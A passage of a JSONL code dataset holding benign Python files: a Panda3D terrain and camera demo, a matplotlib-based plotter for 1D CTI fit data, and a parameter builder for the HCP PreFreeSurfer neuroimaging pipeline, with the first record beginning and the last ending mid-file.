[\"Invalid request.\"])\n\n msg_list = []\n if isinstance(messages, list):\n msg_list = messages\n else:\n for value in messages.values():\n msg_list += value\n\n res = jsonify({'message': msg_list})\n if headers:\n return res, err.code, headers\n else:\n return res, err.code\n","sub_path":"backend/core/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"453860106","text":"from direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\nfrom panda3d.core import LPoint3, LVector3\nfrom direct.gui.OnscreenText import OnscreenText\nfrom direct.task.Task import Task\nfrom math import sin, cos, pi\nfrom random import randint, choice, random\nfrom direct.interval.MetaInterval import Sequence\nfrom direct.interval.FunctionInterval import Wait, Func\nimport sys\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.task import Task\nfrom direct.interval.LerpInterval import LerpTexOffsetInterval, LerpPosInterval\nfrom pandac.PandaModules import CompassEffect, CollisionTraverser, CollisionNode\nfrom pandac.PandaModules import CollisionSphere, CollisionHandlerQueue, Material\nfrom pandac.PandaModules import VBase4, VBase3, TransparencyAttrib\nfrom panda3d.core import AmbientLight, DirectionalLight, Vec4, Vec3, Fog\nfrom panda3d.core import BitMask32, Texture, TextNode, TextureStage\nfrom panda3d.core import NodePath, PandaNode\nfrom direct.gui.OnscreenText import OnscreenText\n\n\n\n\n\nclass MyApp(ShowBase):\n\tdef __init__(self):\n\t\tShowBase.__init__(self)\n\t\t#base.disableMouse()\n\t\tself.keys = {\"turnLeft\": 0, \"turnRight\": 0,\n\t\t\t\t\"accel\": 0, \"fire\": 0}\n\t\tself.accept(\"arrow_left\", self.setKey, [\"turnLeft\", 1])\n\t\tself.accept(\"arrow_left-up\", self.setKey, [\"turnLeft\", 0])\n\t\tself.accept(\"arrow_right\", self.setKey, [\"turnRight\", 1])\n\t\tself.accept(\"arrow_right-up\", self.setKey, [\"turnRight\", 0])\n\t\tself.accept(\"arrow_up\", self.setKey, [\"accel\", 1])\n\t\tself.accept(\"arrow_up-up\", self.setKey, [\"accel\", 0])\n\t\tself.accept(\"space\", self.setKey, [\"fire\", 1])\n\t\tself.accept('escape', sys.exit)\n\t\tself.worldsize = 1024\n\t\t#m = loader.loadModel(\"mymodel.egg\")\n\t\t#myTexture = loader.loadTexture(\"texture2.jpeg\")\n\t\t# terrain = GeoMipTerrain(\"mySimpleTerrain\")\n\t\t# terrain.setHeightfield(\"heightmap.bmp\")\n\t\t# terrain.setColorMap(\"texture2.jpeg\")\n\t\t# root = terrain.getRoot()\n\t\t# root.reparentTo(render)\n\t\t# root.setSz(100)\n\t\t# terrain.generate()\n\n\t\t#water\n\t\tself.water = self.loader.loadModel('square.egg')\n\t\tself.water.setSx(self.worldsize)\n\t\tself.water.setSy(self.worldsize)\n\t\tself.water.setPos(self.worldsize/6,self.worldsize/6,70) # sea level\n\t\tself.water.setTransparency(TransparencyAttrib.MAlpha) \n\t\tnewTS = TextureStage('1')\n\t\tself.water.setTexture(newTS,self.loader.loadTexture('water.png'))\n\t\tself.water.setTexScale(newTS,4)\n\t\tself.water.reparentTo(self.render)\n\t\tLerpTexOffsetInterval(self.water, 200, (1,0),(0,0), textureStage=newTS).loop()\n\n\n\t\tterrain = GeoMipTerrain(\"mySimpleTerrain\")\n\t\tterrain.setHeightfield(\"heightmap5.jpeg\")\n\t\tterrain.setBruteforce(True)\n\t\tterrain.getRoot().reparentTo(render)\n\t\tterrain.setColorMap(\"texture2.jpeg\")\n\t\tterrain.getRoot().setSz(200)\n\t\tterrain.generate()\n\t\tself.camera.setPos(1 , 1, 3)\n\t\t#self.disableMouse()\n\t\t#base.useTrackball()\n\t\t#m.reparentTo(render)\n\t # Make the mouse invisible, turn off normal mouse controls\n\t\tself.disableMouse()\n\t\tprops = WindowProperties()\n\t\tprops.setCursorHidden(True)\n\t\tself.win.requestProperties(props)\n\t\tself.camLens.setFov(60)\n\t\t# Set the current viewing target\n\t\tself.focus = LVector3(500, -55, 500)\n\t\tself.heading = 300\n\t\tself.pitch = 0\n\t\tself.mousex = 0\n\t\tself.mousey = 0\n\t\tself.last = 0\n\t\tself.mousebtn = [0, 0, 0]\n\t\t#moveTask(self,)\n\t\t# Start the camera control task:\n\t\ttaskMgr.add(self.controlCamera, \"camera-task\")\n\t\tself.accept(\"escape\", sys.exit, [0])\n\t\tself.accept(\"mouse1\", self.setMouseBtn, [0, 1])\n\t\tself.accept(\"mouse1-up\", self.setMouseBtn, [0, 0])\n\t\tself.accept(\"mouse2\", self.setMouseBtn, [1, 1])\n\t\tself.accept(\"mouse2-up\", self.setMouseBtn, [1, 0])\n\t\tself.accept(\"mouse3\", self.setMouseBtn, [2, 1])\n\t\tself.accept(\"mouse3-up\", self.setMouseBtn, [2, 0])\n\t\t#self.accept(\"enter\", self.toggleShader)\n\t\t#self.accept(\"j\", self.rotateLight, [-1])\n\t\t#self.accept(\"k\", self.rotateLight, [1])\n\t\tself.accept(\"arrow_left\", self.rotateCam, [-1])\n\t\tself.accept(\"arrow_right\", self.rotateCam, [1])\n\t\t\n\t\t#terrain.setTexture(myTexture)\n\t\tdef updateTask(task):\n\t\t\tterrain.update()\n\t\t\treturn task.cont\n\t\t\n\t\ttaskMgr.add(updateTask, \"update\")\n\t\t#taskMgr.add(waterlevel,\"updatewater\")\n\t\ttaskMgr.add(self.moveTask,\"move\")\n\t\ttaskMgr.add(self.waterlevel,\"water\")\n\t\t#taskMgr.add(moveTask,\"move\")\n\tx = 1\n\tA = KeyboardButton.ascii_key('a')\n\tP = KeyboardButton.ascii_key('p')\n\tD = KeyboardButton.ascii_key('d')\n\tW = KeyboardButton.ascii_key('w')\n\tS = KeyboardButton.ascii_key('s')\n\tU = KeyboardButton.ascii_key('u')\n\tL = KeyboardButton.ascii_key('l')\n\tdef waterlevel(self, task):\n\t\tis_down = base.mouseWatcherNode.is_button_down\n\t\tif is_down(self.P):\n\n\t\t\tself.water.setPos(self.worldsize/6,self.worldsize/6,70+self.x) # sea level\n\t\t\tself.x = self.x + 0.1\n\t\t\t#newTS = TextureStage('1')\n\t\t\t#self.water.setTexture(newTS,self.loader.loadTexture('water.png'))\n\t\t\t#self.water.setTransparency(TransparencyAttrib.MAlpha) \n\t\t\t#newTS = TextureStage('1')\n\t\t\t#self.water.setTexture(newTS,self.loader.loadTexture('water.png'))\n\t\t\t#self.water.setTexScale(newTS,100)\n\t\t\t#self.water.setColorMap('water.png')\n\t\t\t#LerpTexOffsetInterval(self.water, 200, (1,0),(0,0), textureStage=newTS).loop()\n\t\t\tself.water.reparentTo(self.render)\n\t\treturn Task.cont\n\tdef rotateCam(self, offset):\n\t\tself.heading = self.heading - offset * 10\n\tdef setMouseBtn(self, btn, value):\n\t\tself.mousebtn[btn] = value\n\tdef setKey(self, key, val):\n\t\tself.keys[key] = val\t\n\tdef moveTask(self, task):\n\t\tis_down = base.mouseWatcherNode.is_button_down\n\t\tdt = globalClock.getDt()\n\t\tif is_down(self.A):\n\t\t\tself.camera.setX(self.camera, -20 * dt)\n\t\tif is_down(self.D):\n\t\t\tself.camera.setX(self.camera, +20 * dt)\n\t\tif is_down(self.W):\n\t\t\tself.camera.setY(self.camera, +20 * dt)\n\t\tif is_down(self.S):\n\t\t\tself.camera.setY(self.camera, -20 * dt)\n\t\tif is_down(self.U):\n\t\t\tself.camera.setZ(self.camera, +20 * dt)\n\t\tif is_down(self.L):\n\t\t\tself.camera.setZ(self.camera, -20 * dt)\n\t\treturn task.cont\n\tdef controlCamera(self, task):\n\t# figure out how much the mouse has moved (in pixels)\n\t\tmd = self.win.getPointer(0)\n\t\tx = md.getX()\n\t\ty = md.getY()\n\t\tif self.win.movePointer(0, 100, 100):\n\t\t\tself.heading = self.heading - (x - 100) * 0.2\n\t\t\tself.pitch = self.pitch - (y - 100) * 0.2\n\t\tif self.pitch < -80:\n\t\t\tself.pitch = -80\n\t\tif self.pitch > 80:\n\t\t\tself.pitch = 80\n\t\tself.camera.setHpr(self.heading, self.pitch, 0)\n\t\tdir = self.camera.getMat().getRow3(1)\n\t\telapsed = task.time - self.last\n\t\tif self.last == 0:\n\t\t\telapsed = 0\n\t\tif self.mousebtn[0]:\n\t\t\tself.focus = self.focus + dir * elapsed * 60\n\t\tif self.mousebtn[1] or self.mousebtn[2]:\n\t\t\tself.focus = self.focus - dir * elapsed * 60\n\t\tself.camera.setPos(self.focus - (dir * 5))\n\t\tif self.camera.getX() < -650.0:\n\t\t\tself.camera.setX(-650)\n\t\tif self.camera.getX() > 650.0:\n\t\t\tself.camera.setX(650)\n\t\tif self.camera.getY() < -650.0:\n\t\t\tself.camera.setY(-650)\n\t\tif self.camera.getY() > 650.0:\n\t\t\tself.camera.setY(650)\n\t\tif self.camera.getZ() < 10.0:\n\t\t\tself.camera.setZ(10)\n\t\tif self.camera.getZ() > 600.0:\n\t\t\tself.camera.setZ(600)\n\t\tself.focus = self.camera.getPos() + (dir * 5)\n\t\tself.last = task.time\n\t\treturn Task.cont\napp = MyApp()\napp.run()\n\n\n\n","sub_path":"panda.py","file_name":"panda.py","file_ext":"py","file_size_in_byte":7049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"8990909","text":"import numpy as np\r\nfrom typing import Callable, Optional\r\n\r\nimport autoarray.plot as aplt\r\n\r\nfrom autoarray.plot.auto_labels import AutoLabels\r\n\r\nfrom autocti.plot.abstract_plotters import Plotter\r\nfrom autocti.dataset_1d.fit import FitDataset1D\r\n\r\n\r\nclass FitDataset1DPlotter(Plotter):\r\n def __init__(\r\n self,\r\n fit: FitDataset1D,\r\n mat_plot_1d: aplt.MatPlot1D = aplt.MatPlot1D(),\r\n visuals_1d: aplt.Visuals1D = aplt.Visuals1D(),\r\n include_1d: aplt.Include1D = aplt.Include1D(),\r\n ):\r\n \"\"\"\r\n Plots the attributes of `FitDataset1D` objects using the matplotlib method `line()` and many other matplotlib\r\n functions which customize the plot's appearance.\r\n\r\n The `mat_plot_1d` attribute wraps matplotlib function calls to make the figure. By default, the settings\r\n passed to every matplotlib function called are those specified in the `config/visualize/mat_wrap/*.ini` files,\r\n but a user can manually input values into `MatPlot1d` to customize the figure's appearance.\r\n\r\n Overlaid on the figure are visuals, contained in the `Visuals1D` object. Attributes may be extracted from\r\n the `Imaging` and plotted via the visuals object, if the corresponding entry is `True` in the `Include1D`\r\n object or the `config/visualize/include.ini` file.\r\n\r\n Parameters\r\n ----------\r\n fit\r\n The fit to the dataset of a 1D dataset the plotter plots.\r\n mat_plot_1d\r\n Contains objects which wrap the matplotlib function calls that make 1D plots.\r\n visuals_1d\r\n Contains 1D visuals that can be overlaid on 1D plots.\r\n include_1d\r\n Specifies which attributes of the `ImagingCI` are extracted and plotted as visuals for 1D plots.\r\n \"\"\"\r\n self.fit = fit\r\n\r\n super().__init__(\r\n dataset=fit.dataset,\r\n mat_plot_1d=mat_plot_1d,\r\n include_1d=include_1d,\r\n visuals_1d=visuals_1d,\r\n )\r\n\r\n def get_visuals_1d(self) -> aplt.Visuals1D:\r\n return self.visuals_1d\r\n\r\n @property\r\n def extract_region_from(self) -> Callable:\r\n return self.fit.dataset.layout.extract_region_from\r\n\r\n def figures_1d(\r\n self,\r\n region: Optional[str] = None,\r\n data: bool = False,\r\n data_logy: bool = False,\r\n noise_map: bool = False,\r\n signal_to_noise_map: bool = False,\r\n pre_cti_data: bool = False,\r\n post_cti_data: bool = False,\r\n residual_map: bool = False,\r\n residual_map_logy: bool = False,\r\n normalized_residual_map: bool = False,\r\n chi_squared_map: bool = False,\r\n ):\r\n \"\"\"\r\n Plots the individual attributes of the plotter's `FitDataset1D` object in 1D.\r\n\r\n The API is such that every plottable attribute of the `FitDataset1D` object is an input parameter of type bool\r\n of the function, which if switched to `True` means that it is plotted.\r\n\r\n Parameters\r\n ----------\r\n region\r\n The region on the 1D dataset where data is extracted and binned {fpr\", \"eper\"}\r\n data\r\n Whether to make a 1D plot (via `plot`) of the image data extracted and binned over the region, with the\r\n noise-map values included as error bars.\r\n data_logy\r\n Whether to make a 1D plot (via `plot`) of the image data extracted and binned over the region, with the\r\n noise-map values included as error bars and the y-axis on a log10 scale.\r\n noise_map\r\n Whether to make a 1D plot (via `plot`) of the noise map.\r\n signal_to_noise_map\r\n Whether to make a 1D plot (via `plot`) of the signal-to-noise map.\r\n pre_cti_data\r\n Whether to make a 1D plot (via `plot`) of the pre-cti data.\r\n post_cti_data\r\n Whether to make a 1D plot (via `plot`) of the post-cti data.\r\n residual_map\r\n Whether to make a 1D plot (via `plot`) of the residual map, with the noise-map values included as error\r\n bars.\r\n residual_map_logy\r\n Whether to make a 1D plot (via `plot`) of the residual map, with the noise-map values included as error\r\n bars and the y-axis on a log10 scale.\r\n normalized_residual_map\r\n Whether to make a 1D plot (via `plot`) of the normalized residual map.\r\n chi_squared_map\r\n Whether to make a 1D plot (via `plot`) of the chi-squared map.\r\n \"\"\"\r\n\r\n suffix = f\"_{region}\" if region is not None else \"\"\r\n title_str = self.title_str_from(region=region)\r\n\r\n y_errors = self.extract_region_from(array=self.fit.noise_map, region=region)\r\n y_extra = self.extract_region_from(array=self.fit.model_data, region=region)\r\n\r\n if data:\r\n y = self.extract_region_from(array=self.fit.data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar\",\r\n y_errors=y_errors,\r\n y_extra=y_extra,\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Data {title_str}\",\r\n yunit=\"e-\",\r\n filename=f\"data{suffix}\",\r\n ),\r\n )\r\n\r\n if data_logy:\r\n y = self.extract_region_from(array=self.fit.data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar_logy\",\r\n y_errors=y_errors,\r\n y_extra=y_extra,\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Data {title_str} [log10]\",\r\n yunit=\"e-\",\r\n filename=f\"data_logy{suffix}\",\r\n ),\r\n )\r\n\r\n if noise_map:\r\n y = self.extract_region_from(array=self.fit.noise_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Noise-Map\",\r\n yunit=\"e-\",\r\n filename=f\"noise_map{suffix}\",\r\n ),\r\n )\r\n\r\n if signal_to_noise_map:\r\n y = self.extract_region_from(\r\n array=self.fit.signal_to_noise_map, region=region\r\n )\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Signal-To-Noise Map\",\r\n yunit=\"\",\r\n filename=f\"signal_to_noise_map{suffix}\",\r\n ),\r\n )\r\n\r\n if residual_map:\r\n y = self.extract_region_from(array=self.fit.residual_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar\",\r\n y_errors=y_errors,\r\n y_extra=np.zeros(shape=y.shape),\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Residual Map {title_str}\",\r\n yunit=\"e-\",\r\n filename=f\"residual_map{suffix}\",\r\n ),\r\n )\r\n\r\n if residual_map_logy:\r\n y = self.extract_region_from(array=self.fit.residual_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar_logy\",\r\n y_errors=y_errors,\r\n y_extra=1.0001 * np.zeros(shape=y.shape),\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Residual Map {title_str}\",\r\n ylabel=\"e-\",\r\n filename=f\"residual_map_logy{suffix}\",\r\n ),\r\n )\r\n\r\n if normalized_residual_map:\r\n y = self.extract_region_from(\r\n array=self.fit.normalized_residual_map, region=region\r\n )\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Normalized Residual Map\",\r\n yunit=r\"\\sigma\",\r\n filename=f\"normalized_residual_map{suffix}\",\r\n ),\r\n )\r\n\r\n if chi_squared_map:\r\n y = self.extract_region_from(array=self.fit.chi_squared_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Chi-Squared Map\",\r\n yunit=r\"\\chi^2\",\r\n filename=f\"chi_squared_map{suffix}\",\r\n ),\r\n )\r\n\r\n if pre_cti_data:\r\n y = self.extract_region_from(array=self.fit.pre_cti_data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Pre CTI Data\",\r\n yunit=\"e-\",\r\n filename=f\"pre_cti_data{suffix}\",\r\n ),\r\n )\r\n\r\n if post_cti_data:\r\n y = self.extract_region_from(array=self.fit.post_cti_data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"CI Post CTI Image\",\r\n yunit=\"e-\",\r\n filename=f\"post_cti_data{suffix}\",\r\n ),\r\n )\r\n\r\n def subplot(\r\n self,\r\n data: bool = False,\r\n noise_map: bool = False,\r\n signal_to_noise_map: bool = False,\r\n pre_cti_data: bool = False,\r\n post_cti_data: bool = False,\r\n residual_map: bool = False,\r\n normalized_residual_map: bool = False,\r\n chi_squared_map: bool = False,\r\n auto_filename=\"subplot_fit\",\r\n **kwargs,\r\n ):\r\n \"\"\"\r\n Plots the individual attributes of the plotter's `FitDataset1D` object in 1D on a subplot.\r\n\r\n The API is such that every plottable attribute of the `FitDataset1D` object is an input parameter of type bool\r\n of the function, which if switched to `True` means that it is included on the subplot.\r\n\r\n Parameters\r\n ----------\r\n data\r\n Whether to make a 1D plot (via `plot`) of the image data extracted and binned over the region, with the\r\n noise-map values included as error bars.\r\n noise_map\r\n Whether to include a 1D plot (via `plot`) of the noise map.\r\n signal_to_noise_map\r\n Whether to include a 1D plot (via `plot`) of the signal-to-noise map.\r\n pre_cti_data\r\n Whether to include a 1D plot (via `plot`) of the pre-cti data.\r\n post_cti_data\r\n Whether to include a 1D plot (via `plot`) of the post-cti data.\r\n residual_map\r\n Whether to include a 1D plot (via `plot`) of the residual map.\r\n normalized_residual_map\r\n Whether to include a 1D plot (via `plot`) of the normalized residual map.\r\n chi_squared_map\r\n Whether to include a 1D plot (via `plot`) of the chi-squared map.\r\n \"\"\"\r\n\r\n region = kwargs.get(\"region\", None)\r\n suffix = f\"_{region}\" if region is not None else \"\"\r\n\r\n self._subplot_custom_plot(\r\n data=data,\r\n noise_map=noise_map,\r\n signal_to_noise_map=signal_to_noise_map,\r\n pre_cti_data=pre_cti_data,\r\n post_cti_data=post_cti_data,\r\n residual_map=residual_map,\r\n normalized_residual_map=normalized_residual_map,\r\n chi_squared_map=chi_squared_map,\r\n auto_labels=AutoLabels(\r\n yunit=\"e-\",\r\n xlabel=\"Pixel No.\",\r\n filename=f\"{auto_filename}{suffix}\",\r\n ),\r\n )\r\n\r\n def subplot_fit(self, region: Optional[str] = None):\r\n \"\"\"\r\n Standard subplot of the attributes of the plotter's `FitDataset1D` object.\r\n \"\"\"\r\n return self.subplot(\r\n region=region,\r\n data=True,\r\n signal_to_noise_map=True,\r\n pre_cti_data=True,\r\n post_cti_data=True,\r\n normalized_residual_map=True,\r\n chi_squared_map=True,\r\n )\r\n","sub_path":"autocti/dataset_1d/plot/fit_plotters.py","file_name":"fit_plotters.py","file_ext":"py","file_size_in_byte":13678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"233561114","text":"\"\"\"\nBuilds, validates, and excecutes parameters for the HCP script \n/opt/HCP-Pipelines/PreFreeSurfer/PreFreeSurferPipeline.sh\npart of the hcp-struct gear\n\"\"\"\nimport os\nimport os.path as op\nfrom collections import OrderedDict\n\nfrom tr import tr\nfrom utils.gear_preliminaries import create_sanitized_filepath\n\nfrom .common import build_command_list, exec_command\n\n\ndef build(context):\n environ = context.gear_dict[\"environ\"]\n config = context.config\n inputs = context._invocation[\"inputs\"]\n\n params = OrderedDict()\n\n # Check for all required inputs. Necessary for API calls\n # TODO: this should be taken care of in gear_preliminaries\n missing = []\n for req in [\"T1\", \"T2\"]:\n if req not in inputs.keys():\n missing.append(req)\n if len(missing) > 0:\n raise Exception(\n \"Please provide the required input file(s), {}!\".format(missing)\n )\n\n params[\"path\"] = context.work_dir\n params[\"subject\"] = config[\"Subject\"]\n params[\"t1\"] = create_sanitized_filepath(context.get_input_path(\"T1\"))\n params[\"t2\"] = create_sanitized_filepath(context.get_input_path(\"T2\"))\n\n # Pre-Fill certain parameters with \"NONE\"\n None_Params = [\n \"fmapmag\",\n \"fmapphase\",\n \"fmapgeneralelectric\",\n \"SEPhaseNeg\",\n \"SEPhasePos\",\n \"seechospacing\",\n \"seunwarpdir\",\n \"echodiff\",\n \"t1samplespacing\",\n \"t2samplespacing\",\n \"gdcoeffs\",\n \"avgrdcmethod\",\n \"topupconfig\",\n ]\n # the parameter \"--bfsigma\" is not accounted for\n for p in None_Params:\n params[p] = \"NONE\"\n\n if \"DwellTime\" in inputs[\"T1\"][\"object\"][\"info\"].keys():\n dwell_time = inputs[\"T1\"][\"object\"][\"info\"][\"DwellTime\"]\n # format dwell_time to 15 places\n params[\"t1samplespacing\"] = format(dwell_time, \".15f\")\n if \"DwellTime\" in inputs[\"T2\"][\"object\"][\"info\"].keys():\n dwell_time = inputs[\"T2\"][\"object\"][\"info\"][\"DwellTime\"]\n # format dwell_time to 15 places\n params[\"t2samplespacing\"] = format(dwell_time, \".15f\")\n\n # HCP PIPE DIR Templates\n # MNI0.7mm template\n params[\"t1template\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T1_\"\n + config[\"TemplateSize\"]\n + \".nii.gz\"\n )\n params[\"t1template2mm\"] = (\n environ[\"HCPPIPEDIR_Templates\"] + \"/MNI152_T1_2mm.nii.gz\"\n ) # Brain extracted MNI0.7mm template\n params[\"t1templatebrain\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T1_\"\n + config[\"TemplateSize\"]\n + \"_brain.nii.gz\"\n )\n\n params[\"t2template\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T2_\"\n + config[\"TemplateSize\"]\n + \".nii.gz\"\n ) # MNI0.7mm T2wTemplate\n params[\"t2templatebrain\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T2_\"\n + config[\"TemplateSize\"]\n + \"_brain.nii.gz\"\n ) # Brain extracted MNI0.7mm T2wTemplate\n params[\"t2template2mm\"] = (\n environ[\"HCPPIPEDIR_Templates\"] + \"/MNI152_T2_2mm.nii.gz\"\n ) # MNI2mm T2wTemplate\n params[\"templatemask\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T1_\"\n + config[\"TemplateSize\"]\n + \"_brain_mask.nii.gz\"\n ) # Brain mask MNI0.7mm template\n params[\"template2mmmask\"] = (\n environ[\"HCPPIPEDIR_Templates\"] + \"/MNI152_T1_2mm_brain_mask_dil.nii.gz\"\n ) # MNI2mm template\n params[\"brainsize\"] = config[\"BrainSize\"]\n params[\"fnirtconfig\"] = (\n environ[\"HCPPIPEDIR_Config\"] + \"/T1_2_MNI152_2mm.cnf\"\n ) # FNIRT 2mm T1w Config\n\n # Parse Inputs\n # If SiemensFieldMap\n if (\"SiemensGREMagnitude\" in inputs.keys()) and (\n \"SiemensGREPhase\" in inputs.keys()\n ):\n params[\"fmapmag\"] = context.get_input_path(\"SiemensGREMagnitude\")\n params[\"fmapphase\"] = context.get_input_path(\"SiemensGREPhase\")\n params[\"avgrdcmethod\"] = \"SiemensFieldMap\"\n if (\"EchoTime\" in inputs[\"SiemensGREMagnitude\"][\"object\"][\"info\"].keys()) and (\n \"EchoTime\" in inputs[\"SiemensGREPhase\"][\"object\"][\"info\"].keys()\n ):\n echotime1 = inputs[\"SiemensGREMagnitude\"][\"object\"][\"info\"][\"EchoTime\"]\n echotime2 = inputs[\"SiemensGREPhase\"][\"object\"][\"info\"][\"EchoTime\"]\n params[\"echodiff\"] = format((echotime2 - echotime1) * 1000.0, \".15f\")\n # Else if TOPUP\n elif (\"SpinEchoNegative\" in inputs.keys()) and (\n \"SpinEchoPositive\" in inputs.keys()\n ):\n params[\"avgrdcmethod\"] = \"TOPUP\"\n SpinEchoPhase1 = context.get_input_path(\"SpinEchoPositive\")\n SpinEchoPhase2 = context.get_input_path(\"SpinEchoNegative\")\n # Topup config if using TOPUP, set to NONE if using regular FIELDMAP\n params[\"topupconfig\"] = environ[\"HCPPIPEDIR_Config\"] + \"/b02b0.cnf\"\n if (\n \"EffectiveEchoSpacing\"\n in inputs[\"SpinEchoPositive\"][\"object\"][\"info\"].keys()\n ):\n SEP_object_info = inputs[\"SpinEchoPositive\"][\"object\"][\"info\"]\n SEN_object_info = inputs[\"SpinEchoNegative\"][\"object\"][\"info\"]\n seechospacing = SEP_object_info[\"EffectiveEchoSpacing\"]\n params[\"seechospacing\"] = format(seechospacing, \".15f\")\n\n if (\"PhaseEncodingDirection\" in SEP_object_info.keys()) and (\n \"PhaseEncodingDirection\" in SEN_object_info.keys()\n ):\n pedirSE1 = SEP_object_info[\"PhaseEncodingDirection\"]\n pedirSE2 = SEN_object_info[\"PhaseEncodingDirection\"]\n pedirSE1 = tr(\"ijk\", \"xyz\", pedirSE1)\n pedirSE2 = tr(\"ijk\", \"xyz\", pedirSE2)\n # Check SpinEcho phase-encoding directions\n if ((pedirSE1, pedirSE2) == (\"x\", \"x-\")) or (\n (pedirSE1, pedirSE2) == (\"y\", \"y-\")\n ):\n params[\"SEPhasePos\"] = SpinEchoPhase1\n params[\"SEPhaseNeg\"] = SpinEchoPhase2\n elif ((pedirSE1, pedirSE2) == (\"x-\", \"x\")) or (\n (pedirSE1, pedirSE2) == (\"y-\", \"y\")\n ):\n params[\"SEPhasePos\"] = SpinEchoPhase2\n params[\"SEPhaseNeg\"] = SpinEchoPhase1\n context.log.warning(\n \"SpinEcho phase-encoding directions were swapped. \\\n Continuing!\"\n )\n params[\"seunwarpdir\"] = pedirSE1.replace(\"-\", \"\").replace(\"+\", \"\")\n # Else if General Electric Field Map\n elif \"GeneralElectricFieldMap\" in inputs.keys():\n # TODO: how do we handle GE fieldmap? where do we get deltaTE?\n raise Exception(\"Cannot currently handle GeneralElectricFieldmap!\")\n\n params[\"unwarpdir\"] = config[\"StructuralUnwarpDirection\"]\n if \"GradientCoeff\" in inputs.keys():\n params[\"gdcoeffs\"] = context.get_input_path(\"GradientCoeff\")\n\n params[\"printcom\"] = \" \"\n context.gear_dict[\"PRE-params\"] = params\n\n\ndef validate(context):\n \"\"\"\n Ensure that the PreFreeSurfer Parameters are valid.\n Raise Exceptions and exit if not valid.\n \"\"\"\n params = context.gear_dict[\"PRE-params\"]\n inputs = context._invocation[\"inputs\"]\n # Examining Brain Size\n if params[\"brainsize\"] < 10:\n context.log(\"Human Brains have a diameter larger than 1 cm!\")\n context.log(\"Setting to defalut of 150 mm!\")\n params[\"brainsize\"] = 150\n # If \"DwellTime\" is not found in T1w/T2w, skip\n # readout distortion correction\n if (params[\"t1samplespacing\"] == \"NONE\") and (params[\"t2samplespacing\"] == \"NONE\"):\n if params[\"avgrdcmethod\"] != \"NONE\":\n context.log.warning(\n '\"DwellTime\" tag not found. '\n + \"Proceeding without readout distortion correction!\"\n )\n params[\"avgrdcmethod\"] = \"NONE\"\n # Examine Siemens Field Map input\n if (\"SiemensGREMagnitude\" in inputs.keys()) and (\n \"SiemensGREPhase\" in inputs.keys()\n ):\n if \"echodiff\" in params.keys():\n if params[\"echodiff\"] == 0:\n raise Exception(\n \"EchoTime1 and EchoTime2 are the same \\\n (Please ensure Magnitude input is TE1)! Exiting.\"\n )\n else:\n raise Exception(\n \"No EchoTime metadata found in FieldMap input file! Exiting.\"\n )\n # Examine TOPUP input\n elif (\"SpinEchoNegative\" in inputs.keys()) and (\n \"SpinEchoPositive\" in inputs.keys()\n ):\n if (\n \"PhaseEncodingDirection\"\n in inputs[\"SpinEchoPositive\"][\"object\"][\"info\"].keys()\n ) and (\n \"PhaseEncodingDirection\"\n in inputs[\"SpinEchoNegative\"][\"object\"][\"info\"].keys()\n ):\n pedirSE1 = inputs[\"SpinEchoPositive\"][\"object\"][\"info\"][\n \"PhaseEncodingDirection\"\n ]\n pedirSE2 = inputs[\"SpinEchoNegative\"][\"object\"][\"info\"][\n \"PhaseEncodingDirection\"\n ]\n pedirSE1 = tr(\"ijk\", \"xyz\", 